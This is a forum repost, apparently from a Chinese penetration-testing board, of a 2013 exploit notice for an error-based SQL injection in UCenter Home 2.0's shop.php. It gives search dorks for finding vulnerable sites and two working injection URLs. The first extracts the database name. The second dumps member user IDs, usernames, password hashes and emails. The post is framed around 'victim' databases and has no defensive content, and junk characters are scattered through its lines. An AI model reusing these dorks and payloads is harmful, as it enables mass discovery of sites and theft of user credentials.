中国网络渗透测试联盟

标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability [打印本页]

作者: admin    时间: 2013-2-27 21:31
标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

8 a( z. S8 F/ ?4 @/ y/ G! f$ `# C__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
* k7 Z  n0 Z% Q0 R7 L2 r' E& m
. s) v+ {9 C8 Y1 j0 _                                 # t" g  a7 T* K2 g; P* [& {
! x: u$ F1 M4 ?/ p! T3 i0 e% ~
*/ Author : KnocKout  
  l- ~  D- S3 h  @8 e+ ~2 s: c, s( E  @3 x; M* F8 ?8 g' A$ }
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  $ J! b7 f0 N) u* ~
/ D9 x& x5 i2 n3 x
*/ Contact: knockoutr@msn.com  ' d/ z, @3 |( m8 B7 U- d* k

( m; f8 l) Q* V5 B6 Z: ~*/ Cyber-Warrior.org/CWKnocKout  / f2 f% i. z9 q9 v5 p- d
+ k! j+ _6 i0 @- V4 o
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  ( B& _  A6 t$ F% a

1 y5 z& _6 i) y, T6 Z3 w, J8 BScript : UCenter Home  
/ ~' U5 z5 y$ K
1 h: j0 b/ B1 a  h( r9 ?3 S  sVersion : 2.0  
! B) }5 T( Y) E' s' U, x) W, _0 D; V5 `* W* ~0 N4 t6 N& W  ^
Script HomePage : http://u.discuz.net/  # p8 j* y# {/ e+ ]1 M$ I
7 k+ G0 d" H* P5 N4 ~
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  0 \7 A4 B5 r! G. Q

0 ]6 h! Q$ x" C  b9 lDork : Powered by UCenter inurl:shop.php?ac=view  + u6 g. K" Q8 R; A: b' V4 r9 t

9 }5 [( r/ n$ }  A; I/ qDork 2 : inurl:shop.php?ac=view&shopid=  5 c) J. r5 l4 ]5 _9 s, H
& R* r. B# [7 m" Y$ B8 A3 f3 o; Y8 V
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
, b) k5 P+ D6 K% H* L
% v, O+ K+ k+ r5 V, ]Vuln file : Shop.php  
: E% b1 a, S0 p' m9 l7 f& f7 w7 _. u& \
value's : (?)ac=view&shopid=  
' b" A, v% o4 R1 k
/ E# b: N2 l, V; a8 TVulnerable Style : SQL Injection (MySQL Error Based)  
. j  S2 F2 K$ p- N2 A' m, S* w* F2 E/ [- g$ U* u$ c: D
Need Metarials : Hex Conversion  
' Z$ W# I, H9 w2 x1 O3 a1 ]' L# d( ~7 L! j  J# I- @) Y0 q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
: F& u/ t" \1 a: T7 W6 E* F) V& {# C! }" w
Your Need victim Database name.   9 o% q0 P& a0 j/ P
' |/ _2 u7 \) W) z
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  2 @* U2 s% K  O4 q+ O: z0 {4 ~  u/ Q

& ^* X8 Z. j. j1 B/ m" s..  
3 t) G9 {, U, M( Q
. a2 N# ]+ N+ i# `1 d7 S% Q/ `6 oDB : Okey.  7 n+ i; {1 ^, |: \9 O% y
8 `2 u. q# `. Z  n3 a
your edit DB `[TARGET DB NAME]`  
" I) ]6 W; d: K* [4 {& _  \' |0 k4 x! Q. y
Example : 'hiwir1_ucenter'  0 C4 k  V0 @  q/ K  n  V
5 D/ \* X! n( I4 f8 F0 V; A
Edit : Okey.  
# G; a7 v, w6 N2 z  K
- u; x! j9 ^' g: h. hYour use Hex conversion. And edit Your SQL Injection Exploit..  2 B  I0 p  t/ i7 F
: g/ U5 S  _( z# B! I
   ; M) d5 B4 n( j0 g/ n( U4 y

8 t3 B) m8 q0 b# a* q; h( F& FExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
/ N" H5 x1 w3 Z9 q7 K




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2